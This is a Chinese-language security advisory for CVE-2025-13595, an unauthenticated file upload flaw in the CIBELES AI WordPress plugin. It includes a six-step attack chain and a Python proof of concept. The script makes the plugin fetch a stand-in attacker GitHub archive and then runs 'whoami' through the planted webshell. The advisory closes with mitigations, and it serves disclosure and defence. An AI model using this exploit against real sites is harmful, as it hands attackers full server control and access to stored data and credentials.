CVE-2025-13595 WordPress CIBELES AI插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-13595

漏洞类型

任意文件上传/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CIBELES AI plugin for WordPress

漏洞概述

CVE-2025-13595是WordPress平台CIBELES AI插件中的一个严重安全漏洞。该漏洞存在于actualizador_git.php文件中，由于缺少适当的权限验证检查，导致未认证攻击者可以向服务器发送恶意请求，下载任意GitHub仓库内容并覆盖插件文件。此漏洞影响1.10.8及之前所有版本，CVSS评分高达9.8，属于严重级别。攻击成功后，攻击者可以完全控制网站服务器，执行任意代码，窃取敏感数据，或将网站作为进一步攻击的跳板。由于该漏洞无需认证即可利用，且可导致远程代码执行，建议所有使用该插件的用户立即采取修复措施。

技术细节

该漏洞的根本原因在于actualizador_git.php文件缺少WordPress capability检查和身份验证机制。攻击者可以直接访问该文件，通过构造特定的HTTP请求参数，指定任意GitHub仓库URL。服务器端代码会直接下载该仓库内容并解压覆盖到插件目录中。攻击者可以上传包含恶意PHP代码的文件（如webshell），然后通过访问该文件实现远程代码执行。由于插件具有文件写入权限，攻击者可以完全控制WordPress站点的文件系统。此漏洞类似于之前披露的多个WordPress插件Git更新功能漏洞，攻击者利用了开发者对安全验证的疏忽。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描互联网上的WordPress站点，识别安装CIBELES AI插件的网站

STEP 2

步骤2

准备阶段：攻击者准备包含恶意PHP代码的GitHub仓库（如webshell），上传到公开GitHub账户

STEP 3

步骤3

漏洞利用：攻击者直接访问vulnerable_endpoint (actualizador_git.php)，发送包含恶意GitHub URL的POST请求

STEP 4

步骤4

文件覆盖：服务器下载恶意仓库内容并解压覆盖插件目录，植入webshell

STEP 5

步骤5

RCE执行：攻击者访问植入的webshell，通过参数执行任意系统命令，完全控制服务器

STEP 6

步骤6

持久化：攻击者可以安装后门、窃取数据库凭证、横向移动或利用服务器作为攻击跳板

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# CVE-2025-13595 PoC - WordPress CIBELES AI Plugin Arbitrary File Upload
# Target: WordPress site with CIBELES AI plugin <= 1.10.8

target_url = "http://target-wordpress-site.com"
# Replace with your malicious GitHub repository containing PHP webshell
git_repo_url = "https://github.com/attacker/malicious-repo/archive/refs/heads/main.zip"

# Path to vulnerable endpoint
vulnerable_endpoint = f"{target_url}/wp-content/plugins/cibeles-ai/actualizador_git.php"

# Construct the malicious request
payload = {
    "git_url": git_repo_url
}

print("[*] Sending exploit request...")
try:
    response = requests.post(vulnerable_endpoint, data=payload, timeout=30)
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] Response: {response.text[:500]}")
    
    # If successful, try to access the uploaded webshell
    if response.status_code == 200:
        webshell_url = f"{target_url}/wp-content/plugins/cibeles-ai/malicious.php"
        print(f"[*] Attempting to access webshell: {webshell_url}")
        shell_test = requests.get(webshell_url, params={"cmd": "whoami"}, timeout=10)
        if shell_test.status_code == 200:
            print("[+] Remote Code Execution Successful!")
            print(f"[+] Output: {shell_test.text}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

CIBELES AI plugin for WordPress <= 1.10.8

防御指南

临时缓解措施

立即采取以下临时缓解措施：1) 禁用或删除CIBELES AI插件；2) 检查服务器文件系统是否有异常文件被创建；3) 使用Web应用防火墙规则阻止对actualizador_git.php文件的访问；4) 审查Web服务器访问日志，查找对插件目录的异常请求；5) 更改所有WordPress管理员账户密码和数据库凭据，因为服务器可能已被完全入侵。